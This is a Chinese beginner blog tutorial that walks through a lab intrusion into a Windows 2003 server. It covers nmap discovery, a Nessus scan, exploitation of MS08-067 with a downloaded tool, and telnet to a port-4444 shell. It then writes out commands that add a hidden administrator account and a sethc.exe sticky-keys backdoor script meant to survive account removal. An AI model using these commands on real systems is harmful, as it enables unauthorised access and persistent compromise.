工欲善其事,必先利其器。在上一篇文章小白為大家介紹了黑客攻擊過程中最用要的一環(huán)——踩點(diǎn)(信息收集)方面的兩款漏洞掃描工具的安裝過程和基本使用方式。今天,就讓小白帶領(lǐng)著大家進(jìn)行一次完整的攻擊過程。
再次回到我們一開始的文章小白介紹了黑客攻擊行為的模型大致為:
踩點(diǎn)-->定位-->入侵-->留后門-->抹去痕跡
本次文章小白將要給大家來演示如何來攻破一臺(tái)winows 2003 服務(wù)器,攻擊的過程也將遵循上面的行為模型。
假設(shè),在小白所在的局域網(wǎng)(ip:192.168.31.0/24)中,有一臺(tái)windows 2003 的服務(wù)器,小白想要到服務(wù)器上面逛上一圈,但是很尷尬的是小白不知道這臺(tái)服務(wù)器的ip地址,也并沒有這臺(tái)服務(wù)器的賬號(hào)
踩點(diǎn)
第一步:使用過nmap對(duì)局域網(wǎng)進(jìn)行掃描,掃描局域網(wǎng)中存在的計(jì)算機(jī)和對(duì)應(yīng)的操作系統(tǒng)。
Nmap命令:
nmap –sn 網(wǎng)段 ->使用ping掃描局域網(wǎng)中存貨的主機(jī)
nmap –O ip地址 ->識(shí)別單個(gè)ip地址的操作系統(tǒng)

通過掃描主機(jī)存活我們可以看到,局域網(wǎng)中存在著5個(gè)ip地址。
192.168.31.1
192.168.31.2
192.168.31.133
192.168.31.254
192.168.31.132
通過簡(jiǎn)單的判斷,192.168.31.1、192.168.31.2、192.168.31.132這三個(gè)地址是小白的電腦和網(wǎng)關(guān)的地址啦 ,可以直接排除。就只剩下192.168.31.133、192.168.31.254這兩個(gè)地址了,接下來我們分別對(duì)這兩個(gè)ip地址進(jìn)行系統(tǒng)的識(shí)別。

通過對(duì)192.168.31.254的系統(tǒng)識(shí)別,它說這臺(tái)計(jì)算機(jī)可能采用了特殊的操作系統(tǒng),它無法識(shí)別,也有可能這個(gè)ip地址它不是一臺(tái)計(jì)算機(jī)。接著,對(duì)192.168.31.133進(jìn)行系統(tǒng)識(shí)別。

果然,找到了服務(wù)器的ip地址,nmap的結(jié)果顯示192.168.31.133這臺(tái)計(jì)算機(jī)使用的正是windws 2003 操作系統(tǒng)。既然知道了ip地址,我們就可以進(jìn)行漏洞掃描啦。
第二步:使用nessus對(duì)系統(tǒng)漏洞進(jìn)行掃描
上一篇文章可能忘記說的一點(diǎn)就是nessus怎么打開了,在這里小白說一下。如果是在自己本地的計(jì)算機(jī)上面安裝了nessus的話,就在火狐或者谷歌瀏覽器中輸入地址:
如果是在其他計(jì)算機(jī)上面安裝的話,就在地址欄中輸入:
https://ip地址:8834
那么,現(xiàn)在,我們就使用nessus開始對(duì)192.168.31.133這臺(tái)服務(wù)器進(jìn)行漏洞掃描。具體的使用方式可以查看小白的上一篇文章噢。



分析
通過上圖的掃描結(jié)果我們可以看出,該服務(wù)器存在漏洞編號(hào)為MS08-067的經(jīng)典緩沖區(qū)溢出漏洞,我們可以通過該漏洞在服務(wù)器上面執(zhí)行代碼。
萬(wàn)能的度娘告訴我,這個(gè)漏洞是有直接的利用工具的,于是小白默默的收藏了一個(gè)。

入侵
第一步:下載ms08-067漏洞利用工具

第二步:打開cmd窗口,將漏洞利用程序用鼠標(biāo)拖進(jìn)窗口

第三步:輸入服務(wù)器的ip地址 192.168.31.133,回車進(jìn)行攻擊。


這里小白猜想,既然是溢出漏洞,肯定和內(nèi)存地址有關(guān)。有可能是win7的內(nèi)存地址和windows2003的不同。
小白找了一臺(tái)windows xp的計(jì)算機(jī)重新進(jìn)行攻擊。

第四步:通過遠(yuǎn)程連接服務(wù)器(192.168.31.133)的4444端口,登陸服務(wù)器。
命令:telnet 192.168.31.133 4444


當(dāng)然了,只是登陸它的命令行界面怎么能行呢?接下來,小白要做的就是利用命令創(chuàng)建一個(gè)管理員賬號(hào),光明正大的利用賬號(hào)密碼登陸。
第五步:創(chuàng)建管理員賬號(hào)密碼,并登陸服務(wù)器
我們通過登陸服務(wù)器的命令行界面來創(chuàng)建管理員賬號(hào)密碼。
命令:
net user 用戶名 密碼 /add
net localgroup administrators 用戶名 /add

這樣,我們就創(chuàng)建了一個(gè)管理員賬號(hào)啦。我們嘗試通過遠(yuǎn)程桌面的方式登陸。
在本地計(jì)算機(jī)的運(yùn)行窗口輸入:mstsc,打開遠(yuǎn)程桌面連接窗口

輸入服務(wù)器的地址



留后門
既然已經(jīng)入侵到服務(wù)了,怎么能不留給自己留下一個(gè)后門呢,方便下次進(jìn)入。如果說我們這次創(chuàng)建的賬號(hào)被管理員刪掉了怎么辦。接下來,小白就在服務(wù)器上面留下一個(gè)簡(jiǎn)單的shift后門。
第一步:編寫shift后門腳本
點(diǎn)擊開始-運(yùn)行,輸入命令:notepad,并回車。


在記事本里面寫上以下代碼:
echo 提權(quán)開始......
copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe
copy c:\windows\system32\dllcache\sethc.exe c:\windows\system32\sethc.exe
echo 提權(quán)結(jié)束......
保存,文件類型選擇所有文件,文件名稱為shift.bat


第二步:雙擊剛保存的bat腳本,創(chuàng)建shift后門

運(yùn)行完成時(shí)候,嘗試在服務(wù)器上面連續(xù)按五次shift鍵

發(fā)現(xiàn)服務(wù)器彈出了一個(gè)命令行界面,這個(gè)界面還是可移植性系統(tǒng)權(quán)限的。接下來,我們把遠(yuǎn)程桌面關(guān)掉,再重新連接,然后不要輸入賬號(hào)密碼,再一次連按五次shift鍵


接著,嘗試在這個(gè)未登錄的命令行界面下創(chuàng)建另一個(gè)管理員賬號(hào)。

我們使用dahuadan這個(gè)賬號(hào)登陸,發(fā)現(xiàn)登陸成功


這樣即使管理員刪除了我們偷偷創(chuàng)建的賬號(hào),也不怕不怕啦~ 就再創(chuàng)建一個(gè)唄~
抹去痕跡
暫不涉及(有需要的同學(xué)自行研究)
Ps:喜歡的留個(gè)贊b( ̄▽ ̄)d ~
也可以關(guān)注專題:黑客師。

最重要的一點(diǎn),不要搞壞事噢!
下一篇文章:小白客帶你走進(jìn)黑客世界6之搞崩你的計(jì)算機(jī)(藍(lán)屏)